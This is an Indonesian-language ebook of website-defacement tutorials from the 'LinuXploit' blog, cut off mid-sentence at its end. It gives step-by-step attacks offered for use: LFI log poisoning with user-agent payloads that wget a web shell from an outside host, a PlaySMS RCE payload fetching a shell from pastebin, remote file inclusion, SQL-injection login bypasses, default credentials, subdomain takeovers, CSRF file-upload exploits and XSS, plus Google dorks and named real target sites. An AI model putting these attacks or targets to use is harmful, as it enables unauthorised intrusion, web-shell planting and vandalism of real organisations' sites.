Anda di halaman 1dari 93

Learn Deface With LinuXploit

Ok halo semuanya pada kali ini saya membuat ebook pembelajaran deface yang
tutorialnya bersumber dari https://sec.linuxploit.com dan btw sec.linuxploit.com dulunya
adalah blog XploitSec ( Blog Milik saya juga ) tapi kontennya saya pindah ke
https://sec.linuxploit.com tujuan saya membuat ini adalah agar kalian lebih mudah untuk
mempelajari deface dan mungkin jika kuota kalian lagi habis, bisa di baca ebook ini
h3h3.

Dan satu hal lagi, tutorial yang saya buat disini hanya sebatas pembelajaran, dosa dan
tindakan criminal yang di lakukan anda, bukan tanggung jawab saya.

Maaf kalo berantakan :b, happy reading !!

Deface Metode Remote DNS

Halo gays balik lagi ama mimin. kali ini mimin bakalan share tutorial deface metode
Remote DNS. Ok Sedikit Penjelasan Dulu.. Remote DNS Hampir mirip seperti Take
Over Error Domain
Bedanya ? Take Over Domain Mengambil website dari ip cpanel dan hanya web error
saja yang bisa di ambil, sedangkan Remote DNS mengambil website dari ip sekitaran
cpanel, web aktif kadang bisa ke ambil juga. langsung aja ke tutorial

Alat Dan Bahan :


- Hp, Pc / Laptop
- Jaringan Internet
- Cpanel Website ( gapunya cpanel ? ngecrack :v )
- Tools Reverse IP ( Google Banyak )
- DNS Lytics Untuk mengecek Ip Sekitaran Cpanel

1. Kalian Masuk Ke Cpanel Punya kalian. Setelah Itu Kalian Liat Shared ip addressnya,
copy shared ip addressnya.
2. kalian masuk ke https://dnslytics.com/ dan masukkan shared ip address cpanel kalian
di kolom search, lalu klik search

3. jika sudah nanti bakalan muncul ip sekitaran cpanel kalian..


4. copy salah satu ip ( pilih yg banyak domainnya ya ) setelah itu pergi ke website yg
menyediakan tools reverse ip lookup disini mimin
menggunakan http://yougetsignal.com/

5. paste ipnya di tools reverse ip, dan lakukan reverse ip, cari web yg error atau juga
kalian bisa menambahkan web hidup ke addon domain di cpanel kalian apabila web
hidup berhasil di taruh ke addon domain kalian tggu saja beberapa menit, apabila
sudah terhubung kalian bisa buat file indexnya

Sekian Dari gw #No_IDentiTy – LinuXploit

Deface Metode LFI

Yow halo exploiter kali ini saya akan membagikan cara deface Local File Inclusion ( LFI
) upload shell dengan metode Proc/Self/Environ. ok tanpa basa basi langsung saja kita
mulai :b.

sebelumnya kalian harus memiliki target yang vulnerable terhadap serangan LFI
Dork :
inurl:".php?id=contact.php"
inurl:index.php?id=contact.php ( selanjutnya akalin sendiri :b )

Contoh : http://target.com/page.php?id=service.php

Kemudian ganti service.php dengan ../../../ lalu jika kalian mendapat error seperti :
Warning: include(../../../) [function.include]: failed to open stream: No such file or
directory in /home/gunslinger/public_html/service.php on line 99

kemungkinan kita mendapat kesempatan untuk memanfaatkan include ke file lain.


selanjutanya kita coba temukan /etc/passwd.
contoh : http://target.com/page.php?id=etc/passwd

tetapi jika masih mendapatkan error kurang lebih sperti ini :


Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or
directory in /home/gunslinger/public_html/service.php on line 99

kita harus menaikkan directory nya, bagaimana ? dengan menambahkan ../ sampai
errornya hilang. contoh : http://target.com/page.php?id=.../../../../../etc/passwd

dan jika berhasil maka akan mendapatkan file /etc/passwd seperti berikut.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi-autoipd:x:104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false
saned:x:106:113::/home/saned:/bin/false
pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
messagebus:x:108:117::/var/run/dbus:/bin/false
polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
haldaemon:x:111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false
gunslinger:x:1000:1000:gunslinger_,,,:/home/gunslinger:/bin/bash
snmp:x:112:65534::/var/lib/snmp:/bin/false
guest:x:113:124:Guest,,,:/tmp/guest-home.rRZGXM:/bin/bash
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin

mari kita cek apakah proc/self/environ bisa di akses atau tidak dengan mengganti
etc/passwd menjadi proc/self/environ
contoh : http://target.com/page.php?id=.../../../../../proc/self/environ

dan jika vuln maka kita akan mendapatkan seperti ini

DOCUMENT_ROOT=/home/gunslinger/public_html GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html,
application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,
image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac
HTTP_HOST=www.site.com
HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15)
Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
PATH=/bin:/usr/bin
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665
REQUEST_METHOD= GET REQUEST_URI =
/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/gunslinger/public_html/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=gunslinger@site.com
SERVER_NAME=www.site.com
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k
PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at
www.site.com Port 80
ok ternyata proc/self/environ bisa di akses, jika anda mendapatkan blank ( halaman
putih ) berarti tidak bisa di akses.

selanjutnya mari kita injeksi dengann malicious kode dengan meracuni http-headernya .
bagaimana kita bisa menginjeksinya? kita bisa menggunakan tamper data pada firefox
addon.
dapat anda download disini : https://addons.mozilla.org/en-US/firefox/addon/966
buka tamper data di firefox lalu masukan url /proc/self/environ yang tadi
"http://site.com/info.php?file=../../../../../../../../../proc/self/environ"
lalu pada user-agent isikan dengan kode berikut :

<?system('wget http://r57.gen.tr/c100.txt -O linuxploit.php');?>

atau

<?exec('wget http://r57.gen.tr/c100.txt -O linuxploit.php');?>

lalu submit.

jika kita berhasil menginjeksi malicious kode berikut, maka shell akan ada di tempat
seperti ini.

http://target.com/linuxploit.php
deface metode readme.io custom domain takeover

Yow Halo Exploiter, masih seputar takeover sebelumya saya membahas takeover
tentang shopify kali ini Readme.io cara ini mungkin sedikit lebih ribet dibandingkan
shopify. ok langsung saja.

Contoh Kasus

situs readme.hackerszone.top sebelumnya menggunakan layanan dari readme.io


kemudian sang developer berhenti menggunakan layanan tersebut kemudian
menghapus domain dari layanan tersebut, namun domain tersebut CNAME atau A
Record ( Web Ip ) masih terhubung ke readme.io

Apa saja syarat agar domain tersebut bisa di take over ? domain yang bisa di take over
adalah domain yang CNAME nya mengarah ke ssl.readmessl.com atau A Record nya
mengarah ke 104.18.210.56

Contoh, situs readme.hackerszone.top ipnya mengarah ke 104.18.210.56


Bagaimana Cara Mengeksploitasinya ?

pertama kalian daftar di readme.io klik ini : https://dash.readme.com/signup


saya tidak perlu menjelaskan cara daftarnya :D
setelah daftar, langsung cek email yg digunakan untuk daftar kemudian verifikasi :D
setelah di dashboard langsung ke Configuration > Custom domain kemudian
masukkan target dan Save :D

kemudian tunggu sampai terhubung, dan btw kalian bisa otak atik dulu webnya biar
tampilan heked bay nya keren :b

Dan Boom Has Been Take Over :D

Hasil : http://readme.hackerszone.top/
Mirror : https://zone-xsec.com/archive/mirror/id/13520

Ok Segitu saja yg bisa saya sampaikan kurang lebihnya mohon maaf


dan jangan lupa untuk share artikel ini ke teman kalian :D
Shopify Custom Domain Takeover

Yow Halo Exploiter, kali ini saya akan memberikan tutorial deface metode Shopify
Custom Domain or Subdomain Takeover. Bagi yang belum tau, shopify adalah
platform situs jual beli yang cukup populer. Dan nampaknya verifikasi di situs ini tidak
ada lagkah tambahan selain hanya menggunakan cname dan a record yang telah
ditentukan.

disini saya menggunakan situs pribadi saya sebagai contoh shop.hackerszone.top


Situs yang sebelumnya menggunakan Shopify, namun kemudian menghapus akun
shopify nya namun domain masih mengarah ke CNAME milik Shopify rentan terhadap
serangan domain takeover ini.

Sorry, This Shop is currently unavailable.


Gambar Diatas adalah Contoh situs yang vuln untuk di take over.
domain yg bisa di take over adalah domain yang CNAME nya mengarah ke
shops.myshopify.com dan A Record ( IP ) nya mengarah ke 23.227.38.65
Contoh, shop.hackerszone.top A Record / Web Ipnya mengarah ke 23.227.38.65,
bagaimana cara kita mengeceknya ?? buka cmd / terminal kalian kemudian ketik

ping target.com
contoh :

ping shop.hackerszone.top

ping shop.hackerszone.top

disitu kalian bisa lihat, bahwa A Record nya mengarah ke 23.227.38.65 itu vuln untuk di
takeover
langsung saja kita daftar ke shopify.com KLIK INI
pake yg trial gak usah bayar, dan daftarnya biasa aja, gak perlu saya jelaskan :D
jika sudah daftar otomatis akan masuk ke dashboard web anda, kemudian klik Online
Store > Domains
setelah itu klik connect existing domain

dan hubungkan target kalian


kemudian verify domain.
dan tunggu sampai domain target kalian ke take over

And Boom, Has Been Takeover :b

Hasil : http://shop.hackerszone.top/
Mirror : https://zone-xsec.com/archive/mirror/id/13040

Ok Itu Saja yg bisa saya sampaikan, kurang lebihnya mohon di terima :D


jangan lupa share artikel ini ke teman kalian :D

Deface Metode Default U/P CMS Mtech

Yow Halo Exploiter, kali ini saya akan membagikan tutorial deface lagi, metode/poc
Default User dan Password CMS Mtech Websolution, btw besok sudah hari raya idul
fitri, jadi saya minta maaf kalo ada kesalahan :D, ok langsung aja.

#Google Dork : "All Rights Reserved by MTech"


#User&Pass : admin
#Login Page : /Account/Login
#Live Target : http://chhapicity.com/Account/Login

Langkah-Langkah

1. kalian dorking dulu, atau gunakan live target yg saya sediakan


2. setelah itu pergi ke login pagenya, lalu login dengan user dan password admin

3. vuln ? akan masuk ke dashboard :D

4. berhubung gakbisa upload shell hanya bisa upload file .jpg .png .jpeg .bmp kalo
kalian mau nyelipin backdoor di jpg juga bisa :D, tapi disini saya akan ke menu kategori
dan edit-edit :D
ok segitu saja yg bisa saya sampaikan
semoga artikel ini bermanfaat bagi kalian :D

Deface Exploit Wp-Json Slider


Yow Halo Exploiter, kali ini saya akan membagikan tutorial deface metode Wordpress
Json Slider Upload File Vulnerability, caranya simpel, ok langsung saja ke intinya.

#Google Dork : inurl:/wp-content/jssor-slider/jssor-uploads/


#Exploit : /wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
# CSRF : Klik Ini
#Live Target : http://maxduhanov.ru

Langkah-Langkah
1. dorking terlebih dahulu, atau gunakan live target di atas

2. setelah itu masukkan exploit di akhir domain target.com/[EXPLOIT], contoh :


http://maxduhanov.ru/wp-admin/admin-
ajax.php?param=upload_slide&action=upload_library

3. jika seperti ini berarti vuln


4. setelah itu kalian copy csrf yg ada di atas, lalu save dengan extensi .html jangan lupa
untuk menaruh target kalian beserta exploit di bagian action=""
contoh :

5 jika sudah, buka csrf kalian di browser dan upload script deface kalian.

6. jika muncul tanda seperti awal ( liat nomor 2 ), berarti sukses ter upload, lalu akses
hasil deface kalian : http://target.com/wp-content/jssor-slider/jssor-
uploads/ScDefaceKamu.html
Contoh : http://maxduhanov.ru/wp-content/jssor-slider/jssor-uploads/0wn.htm
7. dan boom !!

Ok itu saja yg bisa saya sampaikan, jangan lupa juga untuk melihat tutorial deface
lainnya
semoga bermanfaat dan jangan lupa untuk share artikel ini :D

Deface Metode Worldviewer Bypass Admin


Yow Hallo Exploiter, kali ini saya akan membagikan tutorial deface lagi, metode Bypass
Admin Login pada CMS yg di buat oleh Worldviewer.in saya gatau, kurang begitu jelas,
ini proof udah lama atau masih tergolong baru, yang pastinya saya hanya membagikan
ilmu saja.

#Google Dork :
- intext:"Created By: Worldviewer.in."
#Admin Login :
/admin
#User&Password :
'=''or'

1. Dorking Terlebih dahulu

2. kemudian cek admin loginnya : http://target/admin

3. jika ada admin loginnya, masukkan user dan password '=''or'


4. jika vuln bakalan masuk dashboard

5. and boom, selamat mengeksekusi

Itu saja yg bisa saya sampaikan


happy hacking dan selamat menunaikan ibadah puasa bagi yg menunaikan
PlaySMS Unauthenticated RCE Upload Shell

Ok halo exploiter, kali ini saya akan membagikan tutorial deface PlaySMS
Unauthenticated RCE Upload Shell, sudah lama ya gak buat tutorial deface lagi :v.
metode deface ini sangat simpel, tanpa basa basi langsung saja ok.

# Google Dork :
- inurl:?app=main intitle:sms
- inurl:?app=main intext:"recover password"
#Payload RCE :
- {{`wget https://pastebin.com/raw/YNpriSQu -O linuxploit.php`}}

Langkah-Langkah Exploitasi

1. kalian dorking dulu

2. jika sudah menemukan target maka akan muncul tempat login

3. pada bagian username, masukkan payload rce :


{{`wget https://pastebin.com/raw/YNpriSQu -O linuxploit.php`}}
Note : linuxploit.php bisa kalian ubah dengan nama sesuka kalian

4. masukkan payload RCE pada username :


5. akses shell : target.com/namashell.php atau target.com/[path]/namashell.php
6. dan boom

Setelah itu terserah kalian mau di tebas atau titip file doang.
sekian dari saya, semoga bermanfaat

Deface Metode TempFile Hosting


Halo Exploiter kali ini saya akan membagikan tutorial deface simpel metode Temp File
Hosting.
ok tanpa basa basi langsung saja kita mulai.

#Google Dork:
intitle:"Temp File Hosting"

#Live Target :
https://uguu.jgleba.com

1. kalian dorking dulu, atau bisa gunakan live target diatas.

2. saat kalian akses webnya, bakalan muncul tempat upload file, nah kalian bisa upload
script deface kalian
3. setelah di upload kalian tinggal klik aja link dibawahnya

4. And Boom
Ok Itu saja yang bisa saya sampaikan.
stay at home, stay underground & stay safe, bantu putuskan rantai penyebaran covid-
19 di indonesia.
and keep exploiting

#No_iDeNtiTy

Shop737 XSS & Upload Shell Vulnerability


Halo Exploiter. kali ini saya akan membagikan tutorial deface metode/PoC Shop737
Upload Shell & XSS Vulnerability. ok tutornya kita bagi dua, yang pertama kita Mulai
tutorial shop737 upload shell vulnerability.
ini exploit udh lama sih, tpi banyak dri kalian yg minta dibuatin tutor deface exploit2
lama.

#Google Dork :
- intext:"Powered By Shop737" ( Kembangkan Lagi Soalnya Targetnya Udh dikit )
#Exploit : /poto/upload.php

1. Kalian cari target dlu dengan dork diatas, kemudian masukkan exploitnya
target.com/poto/upload.php
jika dimintain user&pass masukkan saja admin & admin

2. jika vuln maka akan masuk ke halaman upload gambar


seperti ini :
pilih kategori lalu telurusi file shell php yang direname tadi
lalu klik upload hingga ada tulisan seperti sukses :)

lihat gambar :

sejarang kita panggil shellnya :)


www.site.com/namakategori/shell.php.xxxjpg

*contoh : cctv-surabaya.com/poto/-/shell.php.xxxjpg
lihat gambar :
jangan lupa , masukkan passwordnya :D
Doorr ..

XSS Vulnerability

1. dorking menggunakan dork diatas tadi.

2. letak vulnerability : /poto/index.php?imgdir=


contoh : target.com/poto/index.php?imgdir="><marquee>Tested By
LinuXploit</marquee>

3. Demo Site : http://www.kaligane.com/poto/index.php?imgdir=

Ok Sekian Dari Saya


Terimakasih Sudah Mampir.
Deface Metode SQL-Injection Without Quote
Halo exploiter. kali ini saya akan membagikan tutorial deface lagi metode/PoC SQL-
injection without quote. cara ini mirip seperti bypass admin/sql ( '=''or' ) dan ( ' or 1=1
limit 1 -- -+ ). ok langsung aja ya.

#Google Dork :
- Powered by SHODH TECHNOLOGIES ( Kembangin Lagi )
#Admin Login :
- /admin
- /web-admin
#User : \
#Pass : ||1#
#Live Target : http://tanahlaut.kalsel.polri.go.id/polres/

1. Dorking Dulu / Gunakan Live Target Diatas

2. cek admin loginnya /admin atau /web-admin. di web itu admin loginnya /admin

3. masukkan user dan passnya

4. kalau vuln bakalan masuk ke dashboard


5. kalo udh masuk yaudah terserah mau diapain. disini saya cma upload berita

6. and boom

Sekian dri saya.


bagi kalian blogger yg mau buat konten ini. tolong budayakan referensi :).
Deface exploit Frontend Register
ok halo exploiter, kali ini saya akan share tutorial deface lagi, metode ini sangat simpel,
ok langsung saja.

#Google Dork :
- inurl:/index.php/en/147/featured
#Exploit :
- /index.php/frontend/login
#Live Target :
https://www.dev.kamaroto.co.id/

1. pertama dorking dlu atau kalian bisa gunakan live target diatas.

2. setelah itu masukkan exploit di akhir domain target.com/exploit contoh


: https://www.dev.kamaroto.co.id/index.php/frontend/login

3. setelah itu kalian daftar / register


note : gunakan email aktif !

4. setelah register. cek email yg kalian gunakan daftar tdi soalnya kalian harus verifikasi
email dlu.
5. setelah di verifikasi, kemudian login dengan akun yg sudah kalian buat tadi.

6. setelah itu klik menu My Profile dan klik add files, kalian upload sc deface ext .txt

7. cara akses ? kalian klik & tahan nama filenya atau akses sperti ini
target.com/files/namafile.txt
contoh : https://www.dev.kamaroto.co.id/files/0d3d316b0c.txt

8. and boom
Ok Sekian Dari Saya Terimakasih
#No_iDeNtiTy

Wp Plugin With Spritz 1.0 RFI

Hola Exploiter !! kali ini saya akan share Tutorial WordPress Plugin WP with Spritz 1.0 -
Remote File Inclusion, Sebelumnya kalian bisa baca apa itu Remote File
Inclusion Disini.

Oke langsung Saja

Bahan - Bahan

- Dork : inurl:/wp-content/plugins/wp-with-spritz/

- Script : https://pastebin.com/raw/EStDfMy3 *kalian bisa membuatnya sendiri di


pastebin
- Exploit : /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=(Script)

Pertama - tama kalian bisa Dorking menggunakan Dork diatas atau menggunakan Live
Target di bawah.
Live Target : http://179.1.14.143/
Selanjutnya masukkan exploit nya
Contoh : http://179.1.14.143/wp-content/plugins/wp-with-
spritz/wp.spritz.content.filter.php?url=https://pastebin.com/raw/EStDfMy3

Ok Segitu aja tutorial kali ini

Deface Exploit Responsive Prestashop 1.6 AFU

Halo Exploiter.. kali ini saya akan membagikan tutorial deface lagi sesuai judul :v.
Deface exploit responsive prestashop 1.6 arbitary file upload.

#Google Dork :
inurl:"/modules/simpleslideshow/"
inurl:"/modules/productpageadverts/"
inurl:"/modules/homepageadvertise/"
#CSRF : KLIK ME
#Exploit : /uploadimage.php
#Live Target : http://www.sfcosmetics.it/modules/homepageadvertise/

1. dorking terlebih dahulu. atau gunakan live target diatas.

2. jika sudah menemukan targetnya masukkan exploit nya


http://www.sfcosmetics.it/modules/homepageadvertise/uploadimage.php
3. jika ada tulisan error seperti gambar dibawah berarti itu vuln, langsung buka csrf.

4. masukkan webtarget beserta exploit pada csrf dan postfile kalian isi usefile. dan klik
titeni target.

5. setelah itu kalian upload shell extensi .gif berhubung target yg saya kasih tidak bisa
upload shell jdi upload script deface saja.

6. jika stelah upload muncul tanda sperti ini "success:namasc.html/namashell.gif"


contoh : success:readme-1.html atau lihat gambar dibawah, itu berarti success.
7. langsung saja akses hasil defacement kalian dengan cara seperti
ini http://www.sfcosmetics.it/modules/homepageadvertise/slides/readme-1.html

8. dan boom

Note : Mau copas artikel ini sertakan sumbernya gan ;)


Sekian dari saya #No_IDentiTy
Deface Exploit Wordpress Theme Sportimo

Hallo Exploiter !1!1 kali ini saya akan membagikan tutorial deface simpel, wp themes
sportimo !. yak btw saya biasanya upload artikelnya pagi hari, tp skrg malam krena pagi
gabisa nulis sibuk kerja wkwk :p

#Google Dork :
- inurl:/wp-content/themes/sportimo-theme/
- index of /wp-content/themes/sportimo-theme/
#Exploit : /wp-content/themes/sportimo-theme/functions/upload-handler.php
#Csrf : KLIK ME !!
#Live Target : http://ichd.ma

1. dorking dlu atau gunakan dork diatas

2. jika sudah, msukkan exploit di akhir domain target.com/exploit contoh


: http://ichd.ma/wp-content/themes/sportimo-theme/functions/upload-handler.php
jika tampilan web sperti gambar dibawah, berarti vuln :)
3. stelah itu buka csrf, link diatas cuy, isi post file dengan orange_themes, lihat gambar
dibawah, dan klik titeni target

4. lngsung upload shell ext .php5 tp karena live target gbisa upshell saya up sc deface
aja :)

5. apabila saat upload muncul nama sc deface kalian, berarti vuln ( readme.html nama
sc saya )

6. cara akses defacement kalian target.com/wp-


content/uploads/tahun/bulan/sckalian.html
contoh : http://ichd.ma/wp-content/uploads/2020/03/readme.html

7. and boom
Sekian dari saya
#No_IDentiTy

Deface Metode Silentum Uploader

Halo exploiter, kali ini saya akan membagikan tutorial deface metode Silentum Uploader
Vulnerability, metode ini sangat simpel. ok langsung aja

#Google Dork :
- inurl:upload.php intext:"htm html"
- inurl:upload.php intext:"powered by silentum"

1. pertama dorking dulu


2. pilih salah satu web, dan jika webnya ada uploadernya, kalian langsung upload sc
deface kalian.

4. cari sc defacenya, dan klik


5. and boom..

Sekian dari saya,


Deface exploit bugzilla

halo exploiter, kali ini saya akan membagikan tutorial deface lagi, yaitu Exploit Bugzilla
proof of concept ini sebenarnya udah lama, ya mirip2 sperti registrasi member, ok
langsung aja sob.

#Google Dork :
- inurl:bugzilla intext:attachment.cgi?id=
- bugzilla intext:attachment.cgi?id= site: (masukkan domain site tujuan)
- inurl:attachment.cgi?id= intext:New Account
- inurl:attachment.cgi?id= intext:New Account site: (masukkan domain site tujuan)
- inurl:bugzilla intext:New Account
- inurl:bugzilla intext:New Account site: (masukkan domain site tujuan)
- inurl:bugzilla intext:New Account site:com (contoh domainnya site tujuan com)

#Live Target : https://bugs.koha-community.org/bugzilla3/

Note : sbelumnya kalian harus punya akun gmail yang aktif !

1. dorking dlu, atau gunakan live target diatas

2. jika tampilan web sperti ini, berarti vuln, dan klik menu New Account
3. jika sudah, tambahkan alamat email kalian yg aktif
dan klik send

4. jika sudah cek email kalian, krena link verifikasi dikirim ke email kalian. jika linknya
sudah masuk ke email klian, klik link yang panjang itu sob :v
5. jika sudah klian klik, kalian akan diarahkan ke sini ( liat gambar dibawah ) isi nama
dan password kalian, dan klik create

6. jika sukses maka akan dialihkan kesini ( lihat gambar bawah )


stelah itu kalian klik menu New
7. jika sudah, klian klik salah satu bug, saya disini mengklik bug Koha

8. jika klian sudah mengklik salah satu bug, kalian isi semua kolom, dan pada bagian
attachment klik add attachment dan masukkan sc deface kalian ext .html jangan lupa isi
description
dan klik submit bug
9. jika kalian cri nama file kalian, dan klik ( hackd itu nama file saya )

10. dan booom


hasil saya : https://bugs.koha-community.org/bugzilla3/attachment.cgi?id=101321
Ok sekian dri saya, terimakasih :)!

Deface Exploit Wp Easy Comment Upload File

halo whats up exploiter, kali ini saya akan share tutorial deface metode wp easy
comment upload plugin, metode ini sangat mudah, ok langsung aja.

#Google dork :
- inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php

#Exploit :
- /wp-content/plugins/easy-comment-uploads/upload-form.php

#Live Target :
- http://www.blog.escasto.ipn.mx/
- https://www.fairyhouses.com/

1. Dorking menggunakan dork diatas atau gunakan live target diatas.


2. kalau sudah masukkan exploit di akhir domain. contoh : target.com/wp-
content/plugins/easy-comment-uploads/upload-form.php

3. jika vuln maka tampilannya sperti gambar di bawah ini

4. upload script deface berformat .txt

5. jika sudah langsung akses saja, dengan cara


target.com/wp-content/uploads/tahun/bulan/scriptkalian.txt
contoh : target.com/wp-content/uploads/2020/03/lix.txt

6. dan taraa berhasil

Hasil Saya :
- https://www.fairyhouses.com/wp-content/uploads/2020/03/lix.txt
- http://www.blog.escasto.ipn.mx/wp-content/uploads/2020/03/lix.txt

Ok sekian dari saya, terimakasih


Deface Exploit Xampp Localwrite Access

Halo exploiter, pada artikel ini saya akan memberikan tutorial deface metode Xampp
localwrite access, sebenarnya ini exploit udh lama, ya mirip2 kyk priv8 scr hasilnya :v.
ok langsung aja ya.

#Google Dork :
inurl:/xampp/lang.php
inurl:/security/lang.php

#Exploit :
/lang.php?Hacked_By_NamaLu

#Live Target :
https://www.umpwr.ac.id/xampp/lang.php
http://vega-apache.ingeneo.co/security/lang.php

1. kalian dorking terlebih dahulu, atau gunakan target diatas

2. jika sudah masuk ke webnya, masukkan exploit diatas,


pilih salah satu, contoh
: http://www.umpwr.ac.id/xampp/lang.php?Hacked_By_LinuXploit dan jika muncul
notice sperti gambar dibawah, berarti berhasil
3. lalu akses hasilnya dengan cara, target.com/xampp/lang.tmp atau
target.com/security/lang.tmp

Ok Semoga Tutorial Ini bermanfaat bagi kalian


Deface Exploit Priv8 SCR

halo exploiter. kali ini saya akan membagikan tutorial deface metode Priv8 SCR, ini
sebenarnya metode lama dan metode ini sangat simpel, ok langsung aja

# Google Dork : inurl:/config/config.izo


# Live Target :
http://coloredlion.com/config/config.izo
http://www.lockwoodhotel.com/config/config.izo
http://www.arthub.com.au/config/config.izo
http://gymtag.net/config/config.izo
http://www.kirtasiyeofisi.com.tr/config/config.izo
https://realdealsoft.com/config/config.izo

1. kalian dorking dlu / gunakan live target diatas

2. jika tampilannya seperti ini. berarti vuln

3. masukkan kata2 mutiara kalian dan klik hajar


4. jika muncul seperti ini, berarti berhasil

5. akses hasilnya target.com/config/tar.tmp


dan boom
Sekian Dari Saya Semoga Bermanfaat

Deface Exploit Com_djclassifieds Upload Shell

halo exploiter, pada artikel kali ini, saya akan memberikan tutorial deface exploit joomla
com_djclassifieds upload shell, ok langsung aja

# Exploit Title : Com_djclassifieds Vulnerability


# Google Dork : inurl:/com_djclassifieds
inurl:/components/com_djclassifieds
# Exploit : /index.php?option=com_djclassifieds&task=upload&tmpl=component
# CSRF : https://pastebin.com/raw/EUnh5RB0

1. Dorking Menggunakan Dork diatas

2. jika sudah menemukan targetnya masukkan exploit di akhir domain site.com/exploit,


contoh : site.com/index.php?option=com_djclassifieds&task=upload&tmpl=component
3. jika tampilannya sperti gambar dibawah ini, berarti vuln

4. langsung saja buka csrfnya link sudah saya taruh tadi diatas, sbelumnya kalian edit
terlebih dahulu dibagian action=" truh link targetmu beserta exploitnya, dan dibagian
value=" isi nama shell yg akan kalian upload, shellnya hrus berextensi .phtml

5. kalau sudah kalian buka csrfnya di browser kalian dan upload shell kalian

6. jika sudah selesai di upload muncul tanda sperti ini lagi, berarti shell sukses
terupload.
7. langsung aja akses shellnya,
target.com/tmp/djupload/namashell.phtml
dan boommm..

8. ke dir /public_html/ dan upload script deface kalian


Sekian Dri saya semoga bermanfaat

Default User/Pass Library Automation Login

#Exploit Title : Default User/Pass Library Automation Login


#Author : User_666 A.K.A Alam
#Google Dork : inurl:/index.php?p=login "Powered By Slims"
intext:"Library Automation Login"
#Tested On : Windows 10
#User & Pass : admin

1. Kalian Dorking Terlebih Dahulu.. Jika Sudah Menemukan Webnya Langsung Login
Dengan Default User & Passnya..
2. Jika Berhasil Maka Kamu Akan Masuk dashboard admin

3. Setelah Itu Terserah kalian mau diapakan Use your brain bro !

Deface Metode Chamillo LMS Upload Shell

# Judul Eksploitasi: Chamillo LMS Arbitrary File Upload


# Google Dork: "powered by chamilo"
# Tanggal: 10/05/2018
# Memanfaatkan Pengarang: Sohel Yousef Jellyfish Security Team
# Tautan Perangkat Lunak: https://chamilo.org/en/download/
# Versi: Chamilo 1.11.8 atau lebih rendah ke 1.8
# Kategori: webapps

Untuk file uploadernya gunakan script dibawah ini, buat file baru > copy paste
uploadernya > dan simpan dengan nama bebas dengan format file gif. Contoh nya
menjadi uploader.gif.

<head>
<title>PHP Test</title>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="fileToUpload" id="fileToUpload">
<input type="submit" value="upload file" name="submit">
</form>
</head>
<body>
<?php echo '<p>FILE UPLOAD</p><br>';
$tgt_dir = "uploads/";
$tgt_file = $tgt_dir.basename($_FILES['fileToUpload']['name']);
echo "<br>TARGET FILE= ".$tgt_file;
//$filename = $_FILES['fileToUpload']['name'];
echo "<br>FILE NAME FROM VARIABLE:- ".$_FILES["fileToUpload"]["name"];
if(isset($_POST['submit']))
{
if(file_exists("uploads/".$_FILES["fileToUpload"]["name"]))
{ echo "<br>file exists, try with another name"; }
else {
echo "<br>STARTING UPLOAD PROCESS<br>";
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"],
$tgt_file))
{ echo "<br>File UPLOADED:- ".$tgt_file; }

else { echo "<br>ERROR WHILE UPLOADING FILE<br>"; }


}
}
?>
</body>
</html>

Lalu kalian buat sc depes sendiri, aku sarankan jangan yang ribet dan juga tidak berat
bisa juga kalian gunakan metode jso, jika pas upload script tetapi sehabis itu error (403)
kurangi banyak kodingan nya, untuk yang saya pakai hanya sebesar 1kb saja gan, jika
ingin di tiru silahkan kalian copy paste > simpan

Itu saja yang perlu disiapkan. Untuk shell php ( raw file ) bisa didapat dari github atau di
